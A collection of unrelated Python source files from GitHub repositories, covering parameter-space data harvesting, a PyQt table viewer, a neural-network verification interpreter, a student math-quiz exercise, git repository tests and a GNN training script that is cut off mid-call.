if self.dimensions >= 1:
idx_x = n % domain_lens[0]
params_label += '_' + var_names[0] + '=' + str(domain_values[0][idx_x])
index.append(idx_x)
if self.dimensions >= 2:
idx_y = (n // domain_lens[0]) % domain_lens[1]
params_label += '_' + var_names[1] + '=' + str(domain_values[1][idx_y])
index.append(idx_y)
if self.dimensions >= 3:
idx_z = ((n // domain_lens[0]) // domain_lens[1]) % domain_lens[2]
params_label += '_' + var_names[2] + '=' + str(domain_values[2][idx_z])
index.append(idx_z)
if self.dimensions >= 4:
idx_a = ((n // domain_lens[0]) // domain_lens[1] // domain_lens[2]) % domain_lens[3]
params_label += '_' + var_names[3] + '=' + str(domain_values[3][idx_a])
index.append(idx_a)
if self.dimensions >= 5:
idx_b = ((n // domain_lens[0]) // domain_lens[1] // domain_lens[2] // domain_lens[3]) % domain_lens[4]
params_label += '_' + var_names[4] + '=' + str(domain_values[4][idx_b])
index.append(idx_b)
if self.dimensions >= 6:
idx_c = ((n // domain_lens[0]) // domain_lens[1] // domain_lens[2] // domain_lens[3] // domain_lens[4]) % domain_lens[5]
params_label += '_' + var_names[5] + '=' + str(domain_values[5][idx_c])
index.append(idx_c)
if self.dimensions > 6:
raise NotImplementedError("Harvesting ParameterSpaces of more than 6 dimensions is not implemented yet")
parameters_array[tuple(index)] = pars_labels[pars_labels.index(params_label)]
try:
with open(data_path + params_label, 'rb') as fp:
results = pickle.load(fp)
if verbose:
print("Loading {0}".format(params_label))
except:
if verbose:
print("Dataset {0} Not Found, skipping".format(params_label))
continue
if key_set is not None:
try:
nested_result = NestedDict(results)
if operation is not None:
results_array[tuple(index)] = operation(nested_result[key_set])
else:
results_array[tuple(index)] = nested_result[key_set]
except:
continue
else:
results_array[tuple(index)] = results
else:
parameters_array = self.label
results_array = []
try:
with open(data_path + self.label, 'rb') as fp:
results = pickle.load(fp)
if verbose:
print("Loading Dataset {0}".format(self.label))
if key_set is not None:
nested_result = NestedDict(results)
assert isinstance(results, dict), "Results must be dictionary"
if operation is not None:
results_array = operation(nested_result[key_set])
else:
results_array = nested_result[key_set]
else:
results_array = results
except IOError:
if verbose:
print("Dataset {0} Not Found, skipping".format(self.label))
return parameters_array, results_array
class NestedDict(MutableMapping):
"""
"""
def __init__(self, initial_value=None, root=True):
super(self.__class__, self).__init__()
self._val = {}
if initial_value is not None:
self._val.update(initial_value)
self._found = False
self._root = root
def __getitem__(self, item):
self._found = False
def _look_deeper():
result = tuple()
for k, v in list(self._val.items()):
if isinstance(v, dict):
n = NestedDict(self[k], root=False)
if n[item]:
result += (n[item],)
self._found = self._found or n._found
if self._root:
if self._found:
self._found = False
else:
raise KeyError(item)
result = result[0] if len(result) == 1 else result
return result
def _process_list():
if len(item) == 1:
return self[item[0]]
trunk, branches = item[0], item[1:]
nd = NestedDict(self[trunk], root=False)
return nd[branches] if len(branches) > 1 else nd[branches[0]]
if isinstance(item, list):
return _process_list()
elif self.__isstring_containing_char(item, '/'):
item = item.split('/')
return _process_list()
elif item in self._val:
self._found = True
return self._val.__getitem__(item)
else:
return _look_deeper()
def __setitem__(self, branch_key, value):
self._found = False
def _process_list():
branches, tip = branch_key[1:], branch_key[0]
if self[tip]:
if isinstance(self[tip], tuple):
if isinstance(self[branches], tuple):
raise KeyError('ambiguous keys={!r}'.format(branch_key))
else:
self[branches][tip] = value
else:
self[tip] = value
else:
raise KeyError('no key found={!r}'.format(tip))
def _look_deeper():
nd = NestedDict(root=False)
for k, v in list(self._val.items()):
if v and (isinstance(v, dict) or isinstance(v, NestedDict)):
nd._val = self._val[k]
nd[branch_key] = value
self._found = self._found or nd._found
if self._root:
if self._found:
self._found = False
else:
self._val.__setitem__(branch_key, value)
if isinstance(branch_key, list) or isinstance(branch_key, tuple):
_process_list()
elif self.__isstring_containing_char(branch_key, '/'):
branch_key = branch_key.split('/')
_process_list()
elif branch_key in self._val:
self._found = True
self._val.__setitem__(branch_key, value)
else:
_look_deeper()
def __delitem__(self, key):
self._val.__delitem__(key)
def __iter__(self):
return self._val.__iter__()
def __len__(self):
return self._val.__len__()
def __repr__(self):
return __name__ + str(self._val)
def __call__(self):
return self._val
def __contains__(self, item):
return self._val.__contains__(item)
def anchor(self, trunk, branch, value=None):
nd = NestedDict(root=False)
for k, v in list(self._val.items()):
if v and isinstance(v, dict):
nd._val = self._val[k]
nd.anchor(trunk, branch, value)
self._found = self._found or nd._found
if k == trunk:
self._found = True
if not isinstance(self._val[trunk], dict):
if self._val[trunk]:
raise ValueError('value of this key is not a logical False')
else:
self._val[trunk] = {} # replace None, [], 0 and False to {}
self._val[trunk][branch] = value
if self._root:
if self._found:
self._found = False
else:
raise KeyError
def setdefault(self, key, default=None):
if isinstance(key, list) or isinstance(key, tuple):
trunk, branches = key[0], key[1:]
self._val.setdefault(trunk, {})
if self._val[trunk]:
pass
else:
self._val[trunk] = default
nd = NestedDict(self[trunk], root=False)
if len(branches) > 1:
nd[branches] = default
elif len(branches) == 1:
nd._val[branches[0]] = default
else:
raise KeyError
else:
self._val.setdefault(key, default)
@staticmethod
def __isstring_containing_char(obj, char):
if isinstance(obj, str):
if char in obj:
return True
return False
| zbarni/re_modular_seqlearn | src/utils/parameters.py | parameters.py | py | 31,563 | python | en | code | 1 | github-code | 50 |
35933395089 | import sys
from PyQt5.QtWidgets import QApplication, QDialog, QPushButton, QSlider, QVBoxLayout, QWidget, QFileDialog, QLabel, \
QTableWidgetItem
from PyQt5.QtGui import QPixmap, QImage, QColor, qRgb, QTransform
from PyQt5.QtCore import Qt
from PyQt5 import uic, QtCore
from PIL import Image, ImageEnhance, ImageFilter, ImageOps, ImageDraw
import sqlite3
import csv
class SecondForm(QWidget):
def __init__(self, *args):
super().__init__()
self.initUI()
self.con = sqlite3.connect("db.sqlite")
self.filter_bd()
self.loadTable('images2.csv')
def initUI(self):
self.setWindowTitle('Вторая форма')
uic.loadUi('form2.ui', self)
def filter_bd(self):
self.cur = self.con.cursor()
tab1 = "SELECT * FROM filters"
try:
result = self.cur.execute(tab1).fetchall()
self.tabWid_bd.setRowCount(len(result))
self.tabWid_bd.setColumnCount(len(result[0]))
for i, elem in enumerate(result):
for j, val in enumerate(elem):
self.tabWid_bd.setItem(i, j, QTableWidgetItem(str(val)))
except Exception as e:
print(e)
def loadTable(self, table_name):
try:
with open(table_name) as csvfile:
reader = csv.reader(csvfile, delimiter=';', quotechar='"')
title = next(reader)
self.tableWidget_csv.setColumnCount(len(title))
self.tableWidget_csv.setHorizontalHeaderLabels(title)
self.tableWidget_csv.setRowCount(0)
for i, row in enumerate(reader):
self.tableWidget_csv.setRowCount(
self.tableWidget_csv.rowCount() + 1)
for j, elem in enumerate(row):
self.tableWidget_csv.setItem(i, j, QTableWidgetItem(str(elem)))
self.tableWidget_csv.resizeColumnsToContents()
except Exception as e:
print(e)
if __name__ == "__main__":
app = QApplication(sys.argv)
window = SecondForm()
window.show()
sys.exit(app.exec_())
| Sofi-s/projectQT | csv_table.py | csv_table.py | py | 2,148 | python | en | code | 0 | github-code | 50 |
24616134687 | from copy import deepcopy
from queue import Queue
from typing import Set, Dict, Tuple, List, FrozenSet
from pulp import pulp, PULP_CBC_CMD
from pip._vendor.colorama import Fore, Style
from agbs.abstract_domains.state import State
from agbs.abstract_domains.symbolic_domain import substitute_in_dict, evaluate_with_constraints
from agbs.core.cfg import Node, Function, Activation
from agbs.core.expressions import VariableIdentifier
from agbs.core.statements import Call
from agbs.semantics.forward import DefaultForwardSemantics
class AGBSInterpreter:
def __init__(self, cfg, domain, semantics, nodes):
self._cfg = cfg
self._domain = domain
self._semantics = semantics
self._inputs = nodes[0]
self._relus_name2node = nodes[1]
self._relus_node2name = {n: v for v, n in nodes[1].items()}
self._outputs = nodes[2]
self._initial = None
self._pattern = None
@property
def cfg(self):
return self._cfg
@property
def domain(self):
return self._domain
@property
def semantics(self):
return self._semantics
@property
def inputs(self) -> Set[VariableIdentifier]:
return self._inputs
@property
def relus_name2node(self) -> Dict[VariableIdentifier, Node]:
return self._relus_name2node
@property
def relus_node2name(self) -> Dict[Node, VariableIdentifier]:
return self._relus_node2name
@property
def outputs(self) -> Set[VariableIdentifier]:
return self._outputs
@property
def initial(self):
return deepcopy(self._initial)
@property
def pattern(self) -> List[Tuple[Set[str], Set[str]]]:
return self._pattern
def fwd(self, initial, forced_active=None, forced_inactive=None, constraints=None):
"""Single run of the forward analysis with the abstract domain"""
worklist = Queue()
worklist.put(self.cfg.in_node)
state = deepcopy(initial)
activations = list()
activated, deactivated, uncertain = set(), set(), set()
while not worklist.empty():
current: Node = worklist.get() # retrieve the current node
if isinstance(current, Function):
if activated or deactivated or uncertain:
activations.append((frozenset(activated), frozenset(deactivated), frozenset(uncertain)))
activated, deactivated, uncertain = set(), set(), set()
state = state.affine(current.stmts[0], current.stmts[1], constraints=constraints)
elif isinstance(current, Activation):
if forced_active and current in forced_active:
state = state.relu(current.stmts, active=True)
activated.add(current)
elif forced_inactive and current in forced_inactive:
state = state.relu(current.stmts, inactive=True)
deactivated.add(current)
else:
state = state.relu(current.stmts)
if state.is_bottom():
deactivated.add(current)
if state.flag:
if state.flag > 0:
activated.add(current)
else:
deactivated.add(current)
if current not in activated and current not in deactivated:
uncertain.add(current)
else:
if activated or deactivated or uncertain:
activations.append((frozenset(activated), frozenset(deactivated), frozenset(uncertain)))
activated, deactivated, uncertain = set(), set(), set()
for stmt in reversed(current.stmts):
state = self.semantics.assume_call_semantics(stmt, state)
# update worklist
for node in self.cfg.successors(current):
worklist.put(self.cfg.nodes[node.identifier])
# state.log(self.outputs)
# get lower-bounds and upper-bounds for all outputs
lowers: Dict[str, float] = dict((o.name, state.bounds[o.name].lower) for o in self.outputs)
uppers: Dict[str, float] = dict((o.name, state.bounds[o.name].upper) for o in self.outputs)
self.print_pattern(activations)
if all(lower >= 0 for lower in lowers.values()):
return 1, activations, None
elif any(upper < 0 for upper in uppers.values()):
return -1, activations, None
else:
# retrieve uncertain relus
uncertain: List[Set[str]] = list()
for pack in activations:
if pack[2]:
uncertain.append({self.relus_node2name[n].name for n in pack[2]})
if len(uncertain) == 0:
# for o in self.outputs:
# if o.name in state.expressions:
# # back-substitution
# current = state.expressions[o.name]
# while any(variable in state.expressions for variable in state.expressions[o.name].keys()):
# for sym, val in state.expressions.items():
# if sym in current:
# current = substitute_in_dict(current, sym, val)
# state.expressions[o.name] = current
# # evaluate_with_constraints(state.expressions[o.name])
return None, activations, None
# pick output with smallest lower-bound
lowers: Dict[str, float] = dict((o.name, state.bounds[o.name].lower) for o in self.outputs)
picked: str = min(lowers, key=lowers.get)
# retrieve its symbolic expression
expression: Dict[str, float] = state.symbols[picked][1]
# remove inputs and constants from symbolic expression to only remain with relus
for i in self.inputs:
expression.pop(i.name, None)
expression.pop('_')
# remove forced active relus
for r in forced_active:
expression.pop(self.relus_node2name[r].name, None)
# rank relus by layer
layer_score = lambda relu_name: len(uncertain) - list(relu_name in u for u in uncertain).index(True)
# rank relus by coefficient
coeff_rank = sorted(expression.items(), key=lambda item: (layer_score(item[0]), abs(item[1])), reverse=True)
coeff_score = lambda relu_name: list(relu_name == item[0] for item in coeff_rank).index(True)
# rank relu by range size
range_size = lambda relu_name: state.ranges[relu_name]
range_rank = sorted(list((relu, range_size(relu)) for relu in expression.keys()), key=lambda item: (layer_score(item[0]), item[1]), reverse=True)
range_score = lambda relu_name: list(relu_name == item[0] for item in range_rank).index(True)
# rank relu by polarities
polarity = lambda relu_name: abs(state.polarities[relu_name])
pol_rank = sorted(list((relu, polarity(relu)) for relu in expression.keys()), key=lambda item: (len(uncertain) - layer_score(item[0]), item[1]))
pol_score = lambda relu_name: list(relu_name == item[0] for item in pol_rank).index(True)
# determine final rank
rank = lambda relu: coeff_score(relu) + range_score(relu) + pol_score(relu)
ranked = sorted(list((relu, rank(relu)) for relu in expression.keys()), key=lambda item: item[1])
# return chosen uncertain relu(s)
choice: str = ranked[0][0]
r_layer = list(choice in u for u in uncertain).index(True)
r_coeff = expression[choice]
r_range = state.ranges[choice]
r_polarity = state.polarities[choice]
r_rank = '(layer: {}, coeff: {}, range: {}, polarity, {})'.format(r_layer, r_coeff, r_range, r_polarity)
print('Choice: ', choice, r_rank)
chosen: Set[str] = {choice}
expression = state.expressions[choice]
r_chosen = list()
for name, expr in state.expressions.items():
if name != choice and expr == expression:
chosen.add(name)
r_chosen.append(name)
print('Chosen: {}'.format(', '.join(r_chosen)))
# back-substitution
current = dict(expression)
while any(variable in state.expressions for variable in expression.keys()):
for sym, val in state.expressions.items():
if sym in current:
current = substitute_in_dict(current, sym, val)
expression = current
return 0, activations, (chosen, expression)
def is_redundant(self, constraint, ranges, constraints):
"""
Set the objective coefficients to those of one of the constraints, disable that constraint and solve the LP:
- if the constraint was a LE maximize. In case the optimal value is less or equal to the rhs, the constraint is redundant
- analogously if the constraint was GE minimize. disabled constraint is redundant if the optimal value or greater or equal to the rhs.
"""
(expr, activity) = constraint
_ranges = dict(ranges)
current = dict(
objective=dict(
name=None,
coefficients=[
{"name": name, "value": value} for name, value in expr.items() if name != '_'
]),
constraints=[
dict(
sense=status,
pi=None,
constant=expression['_'],
name=None,
coefficients=[
{"name": name, "value": value} for name, value in expression.items() if name != '_'
],
) for expression, status in constraints
],
variables=[dict(lowBound=l, upBound=u, cat="Continuous", varValue=None, dj=None, name=v) for v, (l, u) in
_ranges.items()],
parameters=dict(name="NoName", sense=-activity, status=0, sol_status=0),
sos1=list(),
sos2=list(),
)
var, problem = pulp.LpProblem.fromDict(current)
problem.solve(PULP_CBC_CMD(msg=False))
if activity < 0:
return pulp.value(problem.objective) + expr['_'] <= 0
elif activity > 0:
return pulp.value(problem.objective) + expr['_'] >= 0
def to_pulp(self, ranges, constraints):
_ranges = dict(ranges)
_ranges["__dummy"] = (0, 0)
current = dict(
objective=dict(name=None, coefficients=[{"name": "__dummy", "value": 1}]),
constraints=[
dict(
sense=status,
pi=None,
constant=expression['_'],
name=None,
coefficients=[
{"name": name, "value": value} for name, value in expression.items() if name != '_'
],
) for expression, status in constraints
],
variables=[dict(lowBound=l, upBound=u, cat="Continuous", varValue=None, dj=None, name=v) for v, (l, u) in
_ranges.items()],
parameters=dict(name="NoName", sense=1, status=0, sol_status=0),
sos1=list(),
sos2=list(),
)
var, problem = pulp.LpProblem.fromDict(current)
problem.solve(PULP_CBC_CMD(msg=False))
if problem.status == -1:
return None
else:
bounds = dict()
for name in ranges:
_current = deepcopy(current)
_current['objective'] = {'name': 'OBJ', 'coefficients': [{'name': name, 'value': 1}]}
_current['parameters'] = {'name': '', 'sense': 1, 'status': 1, 'sol_status': 1} # min
_, _problem = pulp.LpProblem.fromDict(_current)
_problem.solve(PULP_CBC_CMD(msg=False))
lower = pulp.value(_problem.objective)
current_ = deepcopy(current)
current_['objective'] = {'name': 'OBJ', 'coefficients': [{'name': name, 'value': 1}]}
current_['parameters'] = {'name': '', 'sense': -1, 'status': 1, 'sol_status': 1} # max
_, problem_ = pulp.LpProblem.fromDict(current_)
problem_.solve(PULP_CBC_CMD(msg=False))
upper = pulp.value(problem_.objective)
bounds[VariableIdentifier(name)] = (lower, upper)
return list(bounds.items())
def original_status(self, relu_names):
# retrieve uncertain relus
for pack in self.pattern:
if all(name in pack[0] for name in relu_names):
return 1
elif all(name in pack[1] for name in relu_names):
return -1
raise ValueError
def print_pattern(self, activations):
activated, deactivated, uncertain = 0, 0, 0
# print('Activation Pattern: {', end='')
for (a, d, u) in activations:
# print('[')
activated += len(a)
# print('activated: ', ','.join(self.relus_node2name[n].name for n in a))
deactivated += len(d)
# print('deactivated: ', ','.join(self.relus_node2name[n].name for n in d))
uncertain += len(u)
# print('uncertain: ', ','.join(self.relus_node2name[n].name for n in u))
# print(']', end='')
# print('}')
print('#Active: ', activated, '#Inactive: ', deactivated, '#Uncertain: ', uncertain, '\n')
def search(self, in_nxt, in_f_active, in_f_inactive, in_constraints):
status = 0
nxt = in_nxt
f_active, f_inactive = set(in_f_active), set(in_f_inactive)
constraints = list(in_constraints)
alternatives = list()
while status == 0:
if nxt is None:
r_cstr = ''
for i, (e, a) in enumerate(constraints):
r_expr = ' + '.join('({})*{}'.format(v, n) for n, v in e.items() if n != '_')
r_expr = r_expr + ' + {}'.format(e['_'])
if a > 0:
r_cstr = r_cstr + '[{}+]: '.format(i) + r_expr + ' >= 0\n'
else:
r_cstr = r_cstr + '[{}-]: '.format(i) + r_expr + ' <= 0\n'
print('Constraints: ', r_cstr)
print('\n⊥︎')
return alternatives
r_nxt = '; '.join('{} ∈ [{}, {}]'.format(i, l, u) for i, (l, u) in nxt if l != u)
print(Fore.YELLOW + '\n||{}||'.format('=' * (len(r_nxt) + 2)))
print('|| {} ||'.format(r_nxt))
print('||{}||\n'.format('=' * (len(r_nxt) + 2)), Style.RESET_ALL)
entry_full = self.initial.assume(nxt)
r_cstr = ''
for i, (e, a) in enumerate(constraints):
r_expr = ' + '.join('({})*{}'.format(v, n) for n, v in e.items() if n != '_')
r_expr = r_expr + ' + {}'.format(e['_'])
if a > 0:
r_cstr = r_cstr + '[{}+]: '.format(i) + r_expr + ' >= 0\n'
else:
r_cstr = r_cstr + '[{}-]: '.format(i) + r_expr + ' <= 0\n'
print('Constraints: ', r_cstr)
status, pattern, picked = self.fwd(entry_full, forced_active=f_active, forced_inactive=f_inactive)
if status == 1:
print('✔︎')
return alternatives
elif status == -1:
print('✘')
return alternatives
elif status is None:
print('TODO')
return alternatives
else:
(chosen, expression) = picked
r_expr = ' + '.join('({})*{}'.format(v, n) for n, v in expression.items() if n != '_')
r_cstr = r_expr + ' + {}'.format(expression['_'])
activity = self.original_status(chosen)
# if constraints and self.is_redundant((expression, -activity), dict([(f[0].name, f[1]) for f in nxt]), constraints):
# print('Redundant Constraint: ', r_cstr, ' <= 0')
# # the alternative should be unfeasible
# # ...
# # (_chosen, _constraints, _nxt, _f_active, _f_inactive) = alternatives[-1]
# # for name in chosen:
# # _f_inactive.add(self.relus_name2node[VariableIdentifier(name)])
# # alternatives[-1] = (_chosen, _constraints, _nxt, _f_active, _f_inactive)
# # return alternatives
# elif constraints and self.is_redundant((expression, activity), dict([(f[0].name, f[1]) for f in nxt]), constraints):
# print('Redundant Constraint: ', r_cstr, ' >= 0')
# # the alternative should be unfeasible
# # ...
# # (_chosen, _constraints, _nxt, _f_active, _f_inactive) = alternatives[-1]
# # for name in chosen:
# # _f_active.add(self.relus_name2node[VariableIdentifier(name)])
# # alternatives[-1] = (_chosen, _constraints, _nxt, _f_active, _f_inactive)
# # return alternatives
alt_f_active, alt_f_inactive = set(f_active), set(f_inactive)
if activity > 0: # originally active
for name in chosen:
f_inactive.add(self.relus_name2node[VariableIdentifier(name)])
r_cstr = r_cstr + ' <= 0'
for name in chosen:
alt_f_active.add(self.relus_name2node[VariableIdentifier(name)])
else: # originally inactive
assert activity < 0
for name in chosen:
f_active.add(self.relus_name2node[VariableIdentifier(name)])
r_cstr = r_cstr + ' <= 0'
for name in chosen:
alt_f_inactive.add(self.relus_name2node[VariableIdentifier(name)])
print('Added Constraint: ', r_cstr)
alt_constraints = list(constraints)
alt_constraints.append((expression, activity))
alt_nxt = self.to_pulp(dict([(f[0].name, f[1]) for f in nxt]), alt_constraints)
constraints.append((expression, -activity))
nxt = self.to_pulp(dict([(f[0].name, f[1]) for f in nxt]), constraints)
alternatives.append((chosen, alt_constraints, alt_nxt, alt_f_active, alt_f_inactive))
def analyze(self, initial: State):
print(Fore.BLUE + '\n||==================================||')
print('|| domain: {}'.format(self.domain))
print('||==================================||', Style.RESET_ALL)
self._initial = initial
print(Fore.MAGENTA + '\n||==========||')
print('|| Original ||')
print('||==========||\n', Style.RESET_ALL)
unperturbed = [(feature, (0, 0)) for feature in self.inputs]
entry_orig = self.initial.assume(unperturbed)
status, pattern, _ = self.fwd(entry_orig)
# set original activation pattern
self._pattern = list()
for (a, d, _) in pattern:
_a = set(self.relus_node2name[n].name for n in a)
_d = set(self.relus_node2name[n].name for n in d)
self._pattern.append((_a, _d))
prefix = list()
print(Fore.MAGENTA + '\n||========||')
print('|| Path 0 ||')
print('||========||\n', Style.RESET_ALL)
nxt = [(feature, (0, 1)) for feature in self.inputs]
f_active, f_inactive, constraints, alternatives = set(), set(), list(), list()
suffix = self.search(nxt, f_active, f_inactive, constraints)
alternatives = prefix + suffix
path = 1
while len(alternatives) > 0 and path < 50:
print(Fore.MAGENTA + '\n||========||')
print('|| Path {} ||'.format(path))
print('||========||\n', Style.RESET_ALL)
relu, constraints, nxt, f_active, f_inactive = alternatives[-1]
prefix = alternatives[:-1]
suffix = self.search(nxt, f_active, f_inactive, constraints)
alternatives = prefix + suffix
path = path + 1
print('Done')
class ActivationPatternForwardSemantics(DefaultForwardSemantics):
def assume_call_semantics(self, stmt: Call, state: State) -> State:
argument = self.semantics(stmt.arguments[0], state).result
state.assume(argument)
state.result = set()
return state | caterinaurban/A-GBS | src/agbs/engine/agbs_interpreter.py | agbs_interpreter.py | py | 20,949 | python | en | code | 2 | github-code | 50 |
73386469274 | '''
lab13_exercises.py
You will write a class called MathQuiz. It will contain five (5) methods
and simulate a student taking a basic math quiz.
The __init__ method will have three parameters: self, the student name, and a file name.
Assign the names to instance variables and create four more:
a score set to 0,
a boolean for whether the test is graded,
a list for the questions,
and a list for the student responses.
It should also read in the quiz text file and load each line into the questions instance variable.
The __repr__ method should print out the student name, followed by a line of dashes,
whether or not the quiz is graded, their score, and their percentage.
It should look something like this:
Name: Nathan
================
Graded: True
Score: 4/5
Percentage: 80%
or
Name: Nathan
================
Graded: False
The user_submission method will take one parameter: self.
It will print the student name and then print each problem
from the questions list and "add the user's answer the responses list."
The check_answer method takes three parameters: self, a string question, and an string answer.
It must compare the question to the answer, performing the correct operation,
and returns true if the answer matches and false if it does not.
Eg: student.check_answer('2 + 2', '4') --> True
student.check_answer("4 - 2", "1") --> False
The grade_quiz() method takes one parameter: self.
It uses check_answer to compare the questions list and the response list.
For each correct answer, add one to the score
In the main, create two instances of the MathQuiz class and call user_submission on both.
Then print each instance to see the results.
'''
class MathQuiz:
def __init__(self, name, fname):
self.name = name
self.score = 0
self.graded = False
self.questions = []
self.responses = []
for line in open(fname, 'r'):
self.questions.append(line.strip())
def __repr__(self):
content = '\nName:'.ljust(5) + self.name.rjust(11) + '\n'
content += '=' * 16 + '\n'
content += 'Graded:'.ljust(11) + str(self.graded).rjust(5) + '\n'
if self.graded == True:
content += 'Score:'.ljust(12) + str(self.score).rjust(2) + '/5\n'
content += 'Percentage:'.ljust(12) + (str(self.score * 20) + '%').rjust(4) + '\n'
return content
def user_submission(self):
print(self)
for problem in self.questions:
user_respose = input(problem + ' = ')
self.responses.append(user_respose)
def check_answer(self, question, answer):
sign = qustion.split()[1]
if sign == '+':
result = qustion.split()[0] + qustion.split()[1]
elif sign == '-':
result = qustion.split()[0] - qustion.split()[1]
elif sign == '*':
result = qustion.split()[0] * qustion.split()[1]
elif sign == '/':
result = qustion.split()[0] / qustion.split()[1]
return result == int(answer)
def grade_quiz(self):
for j in range(len(self.questions)):
if self.check_answer(self.questions[j], self.responses[j]):
self.score += 1
self.graded = True
def main():
nick = MathQuiz('nick', 'quiz.txt')
benson = MathQuiz('benson', 'quiz.txt')
nick.user_submission()
benson.user_submission()
nick.grade_quiz()
benson.grade_quiz()
print(nick)
print(benson)
if __name__ == "__main__":
main()
| ksh1ng/python_Exercise | lab13_exercises.py | lab13_exercises.py | py | 3,581 | python | en | code | 1 | github-code | 50 |
73144689435 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import shutil
import unittest
import git
from gitenberg.local_repo import LocalRepo
class TestLocalRepo(unittest.TestCase):
relative_test_repo_path = './gitenberg/tests/test_data/test_repo'
def setUp(self):
git.Repo.init(self.relative_test_repo_path)
self.local_repo = LocalRepo(self.relative_test_repo_path)
def tearDown(self):
shutil.rmtree(self.relative_test_repo_path)
def _touch_file(self, name):
path = os.path.join(self.relative_test_repo_path, name)
with open(path, 'a'):
os.utime(path, None)
def test_add_file(self):
# If we create a file in a repo, and add it to the stage
# is it listed in the representation of the index/stage
self._touch_file('foof')
self.local_repo.add_file('foof')
self.assertEqual(
set(self.local_repo.git.index.entries.keys()),
{(u'foof', 0)}
)
def test_add_all_files(self):
[self._touch_file(f) for f in ['foof', 'offo.txt', 'fofo.md']]
self.local_repo.add_all_files()
self.assertEqual(
set(self.local_repo.git.index.entries.keys()),
{(u'fofo.md', 0), (u'offo.txt', 0), (u'foof', 0)}
)
def test_add_all_files_filters_ignore_list(self):
[self._touch_file(f) for f in ['offo.txt', 'fofo.ogg', 'zoom']]
self.local_repo.add_all_files()
self.assertEqual(
list(self.local_repo.git.index.entries.keys()),
[(u'offo.txt', 0), (u'zoom', 0)]
)
def test_commit(self):
file_name = 'foom.txt'
message = 'this is a commit messaage'
self._touch_file(file_name)
self.local_repo.add_file(file_name)
self.local_repo.commit(message)
latest_commit = self.local_repo.git.heads.master.commit
self.assertEqual(
latest_commit.message,
message
)
def test_file_checks(self):
self.assertFalse(self.local_repo.metadata_file)
| gitenberg-dev/gitberg | gitenberg/tests/test_local_repo.py | test_local_repo.py | py | 2,078 | python | en | code | 105 | github-code | 50 |
7257311945 | import os
import pandas as pd
from sklearn.externals import joblib
from settings import SAVE_MODEL_PATH, SAVE_PREDICTION_PATH, TESTING__DATA_PATH, TRAINING__DATA_PATH
def read_dataframe(path, type='csv'):
dir_path = os.path.abspath(os.path.dirname(__file__))
abs_path = os.path.join(dir_path, path)
if type == 'csv':
df = pd.read_csv(abs_path)
else:
raise RuntimeError("file types other than csv is not supported")
return df
def save_dataframe(dataframe, path=SAVE_PREDICTION_PATH, columns=[]):
dir_path = os.path.abspath(os.path.dirname(__file__))
abs_path = os.path.join(dir_path, path)
dataframe.to_csv(abs_path, columns=columns, index=False)
def get_training_data(path=TRAINING__DATA_PATH):
training_df = read_dataframe(path, "csv")
jobs_variables = training_df.drop("applications", axis=1)
return jobs_variables
def get_testing_data(path=TESTING__DATA_PATH):
testing_df = read_dataframe(path, "csv")
return testing_df
def get_training_labels(label, path=TRAINING__DATA_PATH):
training_df = read_dataframe(path, "csv")
jobs_labels = training_df[label].copy()
return jobs_labels
def save_trained_model(model, path=SAVE_MODEL_PATH):
dir_path = os.path.abspath(os.path.dirname(__file__))
abs_path = os.path.join(dir_path, path)
joblib.dump(model, abs_path)
def get_saved_model(path=SAVE_MODEL_PATH):
dir_path = os.path.abspath(os.path.dirname(__file__))
abs_path = os.path.join(dir_path, path)
model = joblib.load(abs_path)
return model
| ahmedezzeldin93/heyjobs | job_app/utils.py | utils.py | py | 1,561 | python | en | code | 0 | github-code | 50 |
1156488675 |
def to_file_fasta(item, selection='all', structure_indices='all', output_filename=None, syntaxis='MolSysMT'):
from molsysmt.tools.biopython_Seq import is_biopython_Seq
from molsysmt.basic import convert
if not is_biopython_Seq(item):
raise ValueError
if output_filename is None:
raise ValueError
tmp_item = convert(item, to_form=output_filename, selection=selection,
structure_indices=structure_indices, syntaxis=syntaxis)
return tmp_item
| uibcdf/MolSysMT | attic/form/biopython_Seq/to_file_fasta.py | to_file_fasta.py | py | 498 | python | en | code | 11 | github-code | 50 |
25292007954 | """
Train a simple GNN model on
gamma data
"""
import numpy as np
from matplotlib import pyplot as plt
from gamma_gnn.dataset.gamma import GammaDataset
from gamma_gnn.utils.loader import Loader
from gamma_gnn.models import GNN
from gamma_gnn.optimizers import Optimizer
from gamma_gnn.losses import LossHandler
from gamma_gnn.metrics import MetricHandler
from gamma_gnn.utils.callbacks import CallbackHandler
from gamma_gnn.trainer import Trainer
if __name__ == "__main__":
# now generate graph data
gamma_dataset = GammaDataset(
"gamma",
"data/raw/gammas.npz",
"data/"
)
# create the data loader
gamma_loader = Loader(
gamma_dataset,
batch_size=16,
test_split=0.1,
test_seed=0,
validation_split=0.1,
validation_seed=0,
num_workers=8
)
"""
Construct the gamma Model, specify the loss and the
optimizer and metrics.
"""
gamma_config = {
"embedding_size": 32,
"attention_heads": 2,
"layers": 4,
"top_k_ratio": 0.8,
"top_k_every_n": 3,
"dense_neurons": 64
}
gamma_model = GNN(
name = 'gamma_test',
feature_size=gamma_dataset[0].x.shape[1],
edge_dim=gamma_dataset[0].edge_attr.shape[1],
cfg = gamma_config
)
# create loss, optimizer and metrics
gamma_optimizer_config = {
"optimizer": "SGD",
"learning_rate": 0.01,
"momentum": 0.8,
"weight_decay": 0.0001,
"schedulers": {
"ExponentialLR": {
"gamma": 1.0,
},
}
}
gamma_optimizer = Optimizer(
model=gamma_model,
cfg=gamma_optimizer_config
)
# create criterions
gamma_loss_config = {
'BCELoss': {
'alpha': 1.0,
'reduction':'mean',
},
}
gamma_loss = LossHandler(
name="gamma_loss",
cfg=gamma_loss_config,
)
# create metrics
gamma_metric_config = {
'BinaryAccuracy': {
'cutoff': 0.5,
},
'Precision': {
'cutoff': 0.5,
},
'Recall': {
'cutoff': 0.5,
},
'F1Score': {
'cutoff': 0.5,
},
'ROCAUC': {
'cutoff': 0.5,
},
# 'OutputSaver': {},
# 'TargetSaver': {},
}
gamma_metrics = MetricHandler(
"gamma_metric",
cfg=gamma_metric_config,
)
# create callbacks
callback_config = {
'loss': {'criterion_list': gamma_loss},
'metric': {'metrics_list': gamma_metrics},
}
gamma_callbacks = CallbackHandler(
"gamma_callbacks",
callback_config
)
# create trainer
gamma_trainer = Trainer(
model=gamma_model,
criterion=gamma_loss,
optimizer=gamma_optimizer,
metrics=gamma_metrics,
callbacks=gamma_callbacks,
metric_type='test',
gpu=True,
gpu_device=0
)
gamma_trainer.train(
gamma_loader,
epochs=25,
checkpoint=25
